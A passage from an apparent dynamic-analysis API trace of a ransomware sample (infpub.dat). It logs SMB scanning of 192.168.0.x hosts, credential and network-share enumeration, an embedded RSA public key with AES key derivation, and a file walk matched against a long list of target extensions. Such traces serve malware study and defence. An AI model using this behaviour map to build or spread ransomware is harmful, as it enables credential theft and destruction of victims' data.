argp=0x2bcfa24) returned 0 [0018.874] connect (s=0x1ec, name=0x2bcfa14*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.0"), namelen=16) returned -1 [0018.880] select (in: nfds=493, readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0, timeout=0x2bcfa28 | out: readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0) returned 0 [0020.922] __WSAFDIsSet (param_1=0x1ec, param_2=0x2bcf90c) returned 0 [0020.922] closesocket (s=0x1ec) returned 0 [0020.922] socket (af=2, type=1, protocol=0) returned 0x1ec [0020.922] htons (hostshort=0x8b) returned 0x8b00 [0020.922] ioctlsocket (in: s=0x1ec, cmd=-2147195266, argp=0x2bcfa24 | out: argp=0x2bcfa24) returned 0 [0020.922] connect (s=0x1ec, name=0x2bcfa14*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.0"), namelen=16) returned -1 [0020.923] select (in: nfds=493, readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0, timeout=0x2bcfa28 | out: readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0) returned 0 [0023.415] __WSAFDIsSet (param_1=0x1ec, param_2=0x2bcf90c) returned 0 [0023.415] closesocket (s=0x1ec) returned 0 [0023.415] htonl (hostlong=0xc0a80001) returned 0x100a8c0 [0023.415] socket (af=2, type=1, protocol=0) returned 0x1ec [0023.416] htons (hostshort=0x1bd) returned 0xbd01 [0023.416] ioctlsocket (in: s=0x1ec, cmd=-2147195266, argp=0x2bcfa24 | out: argp=0x2bcfa24) returned 0 [0023.416] connect (s=0x1ec, name=0x2bcfa14*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.1"), namelen=16) returned -1 [0023.416] select (in: nfds=493, readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0, timeout=0x2bcfa28 | out: readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0) returned 0 [0025.505] __WSAFDIsSet (param_1=0x1ec, param_2=0x2bcf90c) returned 0 [0025.505] closesocket (s=0x1ec) returned 0 [0025.506] socket (af=2, type=1, protocol=0) returned 0x1ec [0025.506] htons (hostshort=0x8b) returned 0x8b00 [0025.506] ioctlsocket (in: s=0x1ec, cmd=-2147195266, argp=0x2bcfa24 | out: argp=0x2bcfa24) returned 0 [0025.506] connect (s=0x1ec, name=0x2bcfa14*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.1"), namelen=16) returned -1 [0025.506] select (in: nfds=493, readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0, timeout=0x2bcfa28 | out: readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0) returned 0 [0027.580] __WSAFDIsSet (param_1=0x1ec, param_2=0x2bcf90c) returned 0 [0027.580] closesocket (s=0x1ec) returned 0 [0027.581] htonl (hostlong=0xc0a80002) returned 0x200a8c0 [0027.581] socket (af=2, type=1, protocol=0) returned 0x1ec [0027.581] htons (hostshort=0x1bd) returned 0xbd01 [0027.581] ioctlsocket (in: s=0x1ec, cmd=-2147195266, argp=0x2bcfa24 | out: argp=0x2bcfa24) returned 0 [0027.581] connect (s=0x1ec, name=0x2bcfa14*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.2"), namelen=16) returned -1 [0027.581] select (in: nfds=493, readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0, timeout=0x2bcfa28 | out: readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0) returned 0 [0029.639] __WSAFDIsSet (param_1=0x1ec, param_2=0x2bcf90c) returned 0 [0029.639] closesocket (s=0x1ec) returned 0 [0029.640] socket (af=2, type=1, protocol=0) returned 0x1ec [0029.640] htons (hostshort=0x8b) returned 0x8b00 [0029.640] ioctlsocket (in: s=0x1ec, cmd=-2147195266, argp=0x2bcfa24 | out: argp=0x2bcfa24) returned 0 [0029.640] connect (s=0x1ec, name=0x2bcfa14*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.2"), namelen=16) returned -1 [0029.640] select (in: nfds=493, readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0, timeout=0x2bcfa28 | out: readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0) returned 0 [0031.725] __WSAFDIsSet (param_1=0x1ec, param_2=0x2bcf90c) returned 0 [0031.725] closesocket (s=0x1ec) returned 0 [0031.726] htonl (hostlong=0xc0a80003) returned 0x300a8c0 [0031.726] socket (af=2, type=1, protocol=0) returned 0x1ec [0031.726] htons (hostshort=0x1bd) returned 0xbd01 [0031.726] ioctlsocket (in: s=0x1ec, cmd=-2147195266, argp=0x2bcfa24 | out: argp=0x2bcfa24) returned 0 [0031.726] connect (s=0x1ec, name=0x2bcfa14*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.3"), namelen=16) returned -1 [0031.984] select (in: nfds=493, readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0, timeout=0x2bcfa28 | out: readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0) returned 0 [0034.050] __WSAFDIsSet (param_1=0x1ec, param_2=0x2bcf90c) returned 0 [0034.050] closesocket (s=0x1ec) returned 0 [0034.050] socket (af=2, type=1, protocol=0) returned 0x1ec [0034.051] htons (hostshort=0x8b) returned 0x8b00 [0034.051] ioctlsocket (in: s=0x1ec, cmd=-2147195266, argp=0x2bcfa24 | out: argp=0x2bcfa24) returned 0 [0034.051] connect (s=0x1ec, name=0x2bcfa14*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.3"), namelen=16) returned -1 [0034.051] select (nfds=493, readfds=0x0, writefds=0x2bcf90c, exceptfds=0x0, timeout=0x2bcfa28) Thread: id = 32 os_tid = 0xa04 Thread: id = 33 os_tid = 0xa08 [0019.495] GetCurrentThread () returned 0xfffffffe [0019.495] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xb, OpenAsSelf=1, TokenHandle=0xf1fc94 | out: TokenHandle=0xf1fc94*=0x0) returned 0 [0019.496] WNetOpenEnumW (in: dwScope=0x1, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0xf1fc68 | out: lphEnum=0xf1fc68*=0x31b548) returned 0x0 [0019.681] WNetEnumResourceW (in: hEnum=0x31b548, lpcCount=0xf1fc70, lpBuffer=0x36f390, lpBufferSize=0xf1fc74 | out: lpcCount=0xf1fc70, lpBuffer=0x36f390, lpBufferSize=0xf1fc74) returned 0x103 [0019.681] WNetCloseEnum (hEnum=0x31b548) returned 0x0 [0019.681] CredEnumerateW (in: Filter=0x0, Flags=0x0, Count=0xf1fc78, Credential=0xf1fc74 | out: Count=0xf1fc78, Credential=0xf1fc74) returned 0 [0019.684] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd4a112, lpParameter=0x2b51e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x250 [0019.687] GetModuleHandleA (lpModuleName="kernel32") returned 0x76600000 [0019.687] GetProcAddress (hModule=0x76600000, lpProcName="WaitForMultipleObjects") returned 0x76614220 [0019.687] WaitForMultipleObjects (nCount=0x1, lpHandles=0xf1fcd0*=0x250, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.688] Sleep (dwMilliseconds=0x2710) [0030.428] Sleep (dwMilliseconds=0x2710) Thread: id = 34 os_tid = 0xa0c [0019.542] Sleep (dwMilliseconds=0x493e0) [0030.332] GetTickCount () returned 0x16ef7 [0030.332] wsprintfW (in: param_1=0x2a9b230, param_2="%d" | out: param_1="15") returned 2 [0030.332] StrCatW (in: psz1="", psz2="15" | out: psz1="15") returned="15" [0030.332] StrCatW (in: psz1="15", psz2="" | out: psz1="15") returned="15" [0030.332] PathFindFileNameW (pszPath="C:\\Windows\\infpub.dat") returned="infpub.dat" [0030.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="infpub.dat", cchWideChar=-1, lpMultiByteStr=0x2a9b810, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="infpub.dat", lpUsedDefaultChar=0x0) returned 11 [0030.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="192.168.0.1", cchWideChar=-1, lpMultiByteStr=0x2a9b918, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="192.168.0.1", lpUsedDefaultChar=0x0) returned 12 [0030.332] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0030.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="15", cchWideChar=-1, lpMultiByteStr=0x2a9b608, cbMultiByte=520, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="15", lpUsedDefaultChar=0x0) returned 3 [0030.332] rand () returned 41 [0030.332] rand () returned 18467 [0030.332] socket (af=2, type=1, protocol=6) returned 0x27c [0030.333] htons (hostshort=0x1bd) returned 0xbd01 [0030.333] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0030.333] connect (s=0x27c, name=0x2a9b5b8*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.1"), namelen=16) Thread: id = 35 os_tid = 0xa10 [0019.565] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x210 [0019.565] CryptAcquireContextW (in: phProv=0x31b4c8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x31b4c8*=0x3214a8) returned 1 [0019.566] CryptStringToBinaryW (in: pszString="MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB", cchString=0x0, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x31cfa7c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x31cfa7c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0019.566] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x321530 [0019.566] CryptStringToBinaryW (in: pszString="MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB", cchString=0x0, dwFlags=0x1, pbBinary=0x321530, pcbBinary=0x31cfa7c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x321530, pcbBinary=0x31cfa7c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0019.566] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x321530, cbEncoded=0x126, dwFlags=0x0, pDecodePara=0x0, pvStructInfo=0x0, pcbStructInfo=0x31cfa8c | out: pvStructInfo=0x0, pcbStructInfo=0x31cfa8c) returned 1 [0019.570] LocalAlloc (uFlags=0x40, uBytes=0x148) returned 0x37ef48 [0019.570] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x321530, cbEncoded=0x126, dwFlags=0x0, pDecodePara=0x0, pvStructInfo=0x37ef48, pcbStructInfo=0x31cfa8c | out: pvStructInfo=0x37ef48, pcbStructInfo=0x31cfa8c) returned 1 [0019.570] CryptImportPublicKeyInfo (in: hCryptProv=0x3214a8, dwCertEncodingType=0x1, pInfo=0x37ef48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x37ef78*, PublicKey.cbData=0x10e, PublicKey.pbData=0x37ef80*, PublicKey.cUnusedBits=0x0), phKey=0x31b4d0 | out: phKey=0x31b4d0*=0x3807a8) returned 1 [0019.572] LocalFree (hMem=0x37ef48) returned 0x0 [0019.572] LocalFree (hMem=0x321530) returned 0x0 [0019.572] CryptCreateHash (in: hProv=0x3214a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x31cfa88 | out: phHash=0x31cfa88) returned 1 [0019.572] CryptHashData (hHash=0x3807e8, pbData=0x31b4a4, dwDataLen=0x21, dwFlags=0x0) returned 1 [0019.572] CryptDeriveKey (in: hProv=0x3214a8, Algid=0x660e, hBaseData=0x3807e8, dwFlags=0x1, phKey=0x31b4d4 | out: phKey=0x31b4d4*=0x37f480) returned 1 [0019.573] CryptDestroyHash (hHash=0x3807e8) returned 1 [0019.573] CryptSetKeyParam (hKey=0x37f480, dwParam=0x4, pbData=0x31cfa64*=0x1, dwFlags=0x0) returned 1 [0019.573] CryptSetKeyParam (hKey=0x37f480, dwParam=0x3, pbData=0x31cfa60*=0x1, dwFlags=0x0) returned 1 [0019.573] CryptGetKeyParam (in: hKey=0x37f480, dwParam=0x1, pbData=0x0, pdwDataLen=0x31cfa68, dwFlags=0x0 | out: pbData=0x0*, pdwDataLen=0x31cfa68*=0x10) returned 1 [0019.573] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x380038 [0019.573] CryptSetKeyParam (hKey=0x37f480, dwParam=0x1, pbData=0x380038, dwFlags=0x0) returned 1 [0019.573] LocalFree (hMem=0x380038) returned 0x0 [0019.573] CryptCreateHash (in: hProv=0x3214a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x31b4d8 | out: phHash=0x31b4d8) returned 1 [0019.573] CryptHashData (hHash=0x368270, pbData=0x31b4a4, dwDataLen=0x21, dwFlags=0x0) returned 1 [0019.573] CryptGetHashParam (in: hHash=0x368270, dwParam=0x2, pbData=0x0, pdwDataLen=0x31b4dc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x31b4dc) returned 1 [0019.573] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd460f9, lpParameter=0x31b498, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x214 [0019.574] PathCombineW (in: pszDest=0x31cf878, pszDir="C:\\", pszFile="*" | out: pszDest="C:\\*") returned="C:\\*" [0019.575] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x31cf420 | out: lpFindFileData=0x31cf420) returned 0x3682b0 [0019.575] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.575] PathCombineW (in: pszDest=0x31cf670, pszDir="C:\\", pszFile="$Recycle.Bin" | out: pszDest="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0019.575] StrStrIW (lpFirst="C:\\$Recycle.Bin", lpSrch="\\Windows") returned 0x0 [0019.575] StrStrIW (lpFirst="C:\\$Recycle.Bin", lpSrch="\\Program Files") returned 0x0 [0019.575] StrStrIW (lpFirst="C:\\$Recycle.Bin", lpSrch="\\ProgramData") returned 0x0 [0019.575] StrStrIW (lpFirst="C:\\$Recycle.Bin", lpSrch="\\AppData") returned 0x0 [0019.575] PathCombineW (in: pszDest=0x31cf1f0, pszDir="C:\\$Recycle.Bin", pszFile="*" | out: pszDest="C:\\$Recycle.Bin\\*") returned="C:\\$Recycle.Bin\\*" [0019.575] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 0x3682f0 [0019.576] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.576] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.576] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.576] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.576] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.576] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\$Recycle.Bin", pszFile="S-1-5-21-3388679973-3930757225-3770151564-1000" | out: pszDest="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0019.576] StrStrIW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpSrch="\\Windows") returned 0x0 [0019.576] StrStrIW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpSrch="\\Program Files") returned 0x0 [0019.576] StrStrIW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpSrch="\\ProgramData") returned 0x0 [0019.576] StrStrIW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpSrch="\\AppData") returned 0x0 [0019.576] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", pszFile="*" | out: pszDest="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*" [0019.576] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.576] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.576] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.576] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.576] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.576] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.576] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", pszFile="desktop.ini" | out: pszDest="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" [0019.576] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0019.576] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".ini.") returned 0x0 [0019.576] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.576] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.577] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 0 [0019.577] FindClose (in: hFindFile=0x3682f0 | out: hFindFile=0x3682f0) returned 1 [0019.577] FindNextFileW (in: hFindFile=0x3682b0, lpFindFileData=0x31cf420 | out: lpFindFileData=0x31cf420) returned 1 [0019.577] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.577] PathCombineW (in: pszDest=0x31cf670, pszDir="C:\\", pszFile="Boot" | out: pszDest="C:\\Boot") returned="C:\\Boot" [0019.577] StrStrIW (lpFirst="C:\\Boot", lpSrch="\\Windows") returned 0x0 [0019.577] StrStrIW (lpFirst="C:\\Boot", lpSrch="\\Program Files") returned 0x0 [0019.577] StrStrIW (lpFirst="C:\\Boot", lpSrch="\\ProgramData") returned 0x0 [0019.577] StrStrIW (lpFirst="C:\\Boot", lpSrch="\\AppData") returned 0x0 [0019.577] PathCombineW (in: pszDest=0x31cf1f0, pszDir="C:\\Boot", pszFile="*" | out: pszDest="C:\\Boot\\*") returned="C:\\Boot\\*" [0019.577] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 0x3682f0 [0019.577] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.577] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.577] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.577] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.577] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.577] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="BCD" | out: pszDest="C:\\Boot\\BCD") returned="C:\\Boot\\BCD" [0019.577] PathFindExtensionW (pszPath="BCD") returned="" [0019.577] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.578] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.578] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="BCD.LOG" | out: pszDest="C:\\Boot\\BCD.LOG") returned="C:\\Boot\\BCD.LOG" [0019.578] PathFindExtensionW (pszPath="BCD.LOG") returned=".LOG" [0019.578] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".LOG.") returned 0x0 [0019.578] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.578] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.578] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="BCD.LOG1" | out: pszDest="C:\\Boot\\BCD.LOG1") returned="C:\\Boot\\BCD.LOG1" [0019.578] PathFindExtensionW (pszPath="BCD.LOG1") returned=".LOG1" [0019.578] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".LOG1.") returned 0x0 [0019.578] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.578] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.578] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="BCD.LOG2" | out: pszDest="C:\\Boot\\BCD.LOG2") returned="C:\\Boot\\BCD.LOG2" [0019.578] PathFindExtensionW (pszPath="BCD.LOG2") returned=".LOG2" [0019.578] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".LOG2.") returned 0x0 [0019.578] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.578] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.578] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="BOOTSTAT.DAT" | out: pszDest="C:\\Boot\\BOOTSTAT.DAT") returned="C:\\Boot\\BOOTSTAT.DAT" [0019.578] PathFindExtensionW (pszPath="BOOTSTAT.DAT") returned=".DAT" [0019.578] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".DAT.") returned 0x0 [0019.578] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.578] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.578] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="cs-CZ" | out: pszDest="C:\\Boot\\cs-CZ") returned="C:\\Boot\\cs-CZ" [0019.578] StrStrIW (lpFirst="C:\\Boot\\cs-CZ", lpSrch="\\Windows") returned 0x0 [0019.578] StrStrIW (lpFirst="C:\\Boot\\cs-CZ", lpSrch="\\Program Files") returned 0x0 [0019.578] StrStrIW (lpFirst="C:\\Boot\\cs-CZ", lpSrch="\\ProgramData") returned 0x0 [0019.578] StrStrIW (lpFirst="C:\\Boot\\cs-CZ", lpSrch="\\AppData") returned 0x0 [0019.579] PathCombineW (in: pszDest=0x31ceb68, 